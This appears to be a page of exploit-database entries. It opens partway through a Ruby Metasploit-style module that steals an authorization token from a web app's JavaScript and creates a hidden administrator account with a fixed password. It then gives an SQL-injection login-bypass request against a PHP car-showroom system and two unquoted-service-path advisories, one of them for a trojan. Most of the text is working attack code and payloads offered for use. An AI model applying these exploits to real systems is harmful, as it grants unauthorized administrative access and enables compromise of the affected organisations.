"([\S\s]*?)"/)<br /> string = word.split('"]').join('').split('["').join('')<br /> return string<br /> end <br /> # for Origin and Referer headers<br /><br /> def app_path<br /> res = send_request_cgi({<br /> # default.a.get( check <br /> 'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),<br /> 'method' => 'GET'<br /> }) <br /> <br /> if res && res.code == 200 && res.body =~ /baseURL/<br /> data = res.body<br /> #word = data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/)<br /> base_url = data.scan(/baseURL: '\/([\S\s]*?)'/)[0]<br /> print_status("baseURL: #{base_url}") <br /> return base_url<br /> else<br /> fail_with(Failure::NotVulnerable, 'baseURL not found!')<br /> end<br /> end<br /><br /> def add_user<br /> token = auth_bypass<br /> newuser = Rex::Text.rand_text_alpha_lower(8) <br /> id = Rex::Text.rand_text_numeric(4) <br /> # encrypted password hxZ8I33nmy9PZNhYhms/Dg== / 1111111111<br /> json_data = '{"alarm_request": 1, "city_id": null, "city_name": null, "decryptPassword": null, "email": "' + newuser + '@localhost.local", "id": ' + id + ', "invisible": 0, "isactive": 1, "isblocked": 0, "levelstatus": 1, "local_authorization": 1, "mail_request": 1, "name": "' + newuser + '", "password": "hxZ8I33nmy9PZNhYhms/Dg==", "phone": null, "position": null, "region_name": "test4", "regional_id": 0, "role_id": 1, "role_name": "Sistem Admin", "rolelevel": 3, "status": null, "surname": "' + newuser + '", "totalRecords": null, "try_pass_right": 0, "userip": null, "username": "' + newuser + '", "userType": "Lokal Kullanıcı"}'<br /><br /> res = send_request_cgi(<br /> {<br /> 'method' => 'POST',<br /> 'ctype' => 'application/json',<br /> 'uri' => normalize_uri(target_uri.path, app_path, 'users'),<br /> 'headers' =><br /> {<br /> 'Authorization' => token<br /> },<br /> 'data' => json_data<br /> })<br /><br /> if res && res.code == 200 && res.body =~ /localhost/<br /> print_good("The sysAdmin authorized user has been successfully added.")<br /> print_status("Username: #{newuser}")<br /> print_status("Password: 1111111111")<br /> else<br /> fail_with(Failure::NotVulnerable, 'An error occurred while adding the user. Try again.')<br /> end<br /> end<br /><br /> def auth_bypass<br /><br /> res = send_request_cgi({<br /> # default.a.defaults.headers.post["Authorization"] check <br /> 'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),<br /> 'method' => 'GET'<br /> }) <br /> <br /> if res && res.code == 200 && res.body =~ /default.a.defaults.headers.post/<br /> token = split(res.body, 'Authorization')<br /> print_status("Authorization: #{token}") <br /> return token<br /> else<br /> fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')<br /> end<br /><br /> end<br /><br /> def check <br /> <br /> if auth_bypass =~ /Basic/ <br /> return Exploit::CheckCode::Vulnerable<br /> else<br /> return Exploit::CheckCode::Safe<br /> end<br /> end<br /> <br /> def run<br /> unless Exploit::CheckCode::Vulnerable == check<br /> fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')<br /> end<br /> add_user <br /> end<br />end<br /> <br /></code></pre>
<pre><code># Exploit Title: Online Pre-owned/Used Car Showroom Management System 1.0 - SQLi Authentication Bypass<br /># Date: 01-12-2021<br /># Exploit Author: Mohamed habib Smidi (Craniums)<br /># Vendor Homepage: https://www.sourcecodester.com/php/15067/online-pre-ownedused-car-showroom-management-system-php-free-source-code.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/used_car_showroom.zip<br /># Version: 1.0<br /># Tested on: Ubuntu<br /><br /># Description :<br /><br />Admin panel authentication can be bypassed due to SQL injection vulnerability in the login form.<br /><br /># Request :<br /><br />POST /used_car_showroom/classes/Login.php?f=login HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:93.0)<br />Gecko/20100101 Firefox/93.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 49<br />Origin: http://localhost<br />DNT: 1<br />Connection: close<br />Referer: http://localhost/used_car_showroom/admin/login.php<br />Cookie: PHPSESSID=v0h6049m9ppunsh8vtfc8oj4p5<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br /><br />username='+or+1%3D1+limit+1+--+-%2B&password=aaaa<br /><br />--<br /></code></pre>
<pre><code># Exploit Title: FLAME II MODEM USB - Unquoted Service Path<br /># Discovery by: Ismael Nava<br /># Discovery Date: 02-02-2022<br /># Vendor Homepage: https://www.telcel.com/personas/equipos/modems-usb/alcatel/x602a<br /># Software Links : N/A (Is a BAM)<br /># Tested Version: N/A<br /># Vulnerability Type: Unquoted Service Path<br /># Tested on OS: Windows 10 64 BITS<br /><br /><br />C:>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """<br />FLAME II HSPA USB MODEM Service FLAME II HSPA USB MODEM Service C:\Program Files (x86)\Internet Telcel\ApplicationController.exe Auto<br /><br />C:>sc qc "FLAME II HSPA USB MODEM Service"<br />[SC] QueryServiceConfig CORRECTO<br /><br />NOMBRE_SERVICIO: FLAME II HSPA USB MODEM Service<br /> TIPO : 10 WIN32_OWN_PROCESS<br /> TIPO_INICIO : 2 AUTO_START<br /> CONTROL_ERROR : 1 NORMAL<br /> NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Internet Telcel\ApplicationController.exe<br /> GRUPO_ORDEN_CARGA :<br /> ETIQUETA : 0<br /> NOMBRE_MOSTRAR : FLAME II HSPA USB MODEM Service<br /> DEPENDENCIAS :<br /> NOMBRE_INICIO_SERVICIO: LocalSystem<br /> <br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/1d622f8c72b010b8d7213c032db122e4.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan.Win32.Mucc.ivk<br />Vulnerability: Insecure Service Path<br />Description: The malware creates a service with an unquoted path. Third party attackers who can place an arbitrary executable under c:\ drive can potentially undermine the integrity of the malware by having it run theirs instead with SYSTEM privs.<br />Type: PE32<br />MD5: 1d622f8c72b010b8d7213c032db122e4<br />Vuln ID: MVID-2021-0412<br />Disclosure: 12/03/2021<br /><br /><br />Exploit/PoC:<br />C:\Program Files (x86)\SQLIOSIMS\SQLIOSIMS.exe<br /><br />C:\>sc qc "SQLAGENT MSSQL SQLIOSIMS"<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: SQLAGENT MSSQL SQLIOSIMS<br /> TYPE : 110 WIN32_OWN_PROCESS (interactive)<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 0 IGNORE<br /> BINARY_PATH_NAME : C:\Program Files (x86)\SQLIOSIMS\SQLIOSIMS.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : MSSQLSERVER SQLIOSIMS<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>